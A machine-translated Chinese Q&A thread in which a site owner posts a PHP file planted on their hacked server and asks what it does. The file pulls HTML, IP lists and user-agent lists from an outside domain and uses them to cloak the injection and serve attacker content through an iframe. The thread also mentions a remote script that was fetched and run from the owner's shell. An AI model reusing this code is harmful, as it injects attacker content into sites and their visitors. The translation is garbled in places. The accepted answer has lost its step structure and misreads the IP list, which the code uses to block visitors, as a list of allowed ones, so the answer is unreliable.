编辑:到目前为止一切顺利。
我刚刚发现它已下载并在我的bash历史记录中运行:
http://notsoft.ru/glib
(可以安全查看)
谢谢大家
我刚刚注意到我网站的源php已被编辑。我不知道该怎么做(从那以后我更改了所有密码),但是真正令我困惑的是为什么。
在几页中放置了一个iframe,链接到放置在我的图像目录中的xml.php文件(这是HTACCESS可以访问的唯一目录。由于页面相当复杂并且必须自动放置,因此必须手动放置此代码不刹车这些页面几乎是不可能的。
现在真正使令人困惑的是该XML.php文件的内容,从我看到的内容来看,它什么也没做。
这是代码:
<?php
$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file
if(isset($_GET['ping'])){
echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);
$ip = $exIps[0].".".$exIps[1].".".$exIps[2];
$ips = file_get_contents($urlIps);
if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
die;
}
$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
$userAgent = trim($arrUa[$ua]);
if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
die;
}
}
if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki
echo @file_get_contents($urlHtml);
}else{
?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">
<?php
}
?>
我是否缺少某些东西,或者这是有史以来最奇怪的“骇客”吗?我已经完成了谷歌搜索,找不到之前发生的任何引用。
最佳答案
正确的操作如下。
ping
调用了脚本,如果脚本已答复并终止pingshell
,则HTML文件将下载并显示在浏览器中pingshell
cookie设置为对整个域有效的伪值。 步骤4是重要的一点,它看起来像是代理服务器,用于在给定的位置检索HTML。如果链接不合法,那就不好了。不过,可能出于营销目的,他们可以使用您的URL来提供其内容并获取用户的点击数据。
话虽如此,该代码仅允许从规定的IP地址进行任何形式的访问,因此,除非他们首先捕获该信息,否则似乎是针对特定人群的特定用途而设计的。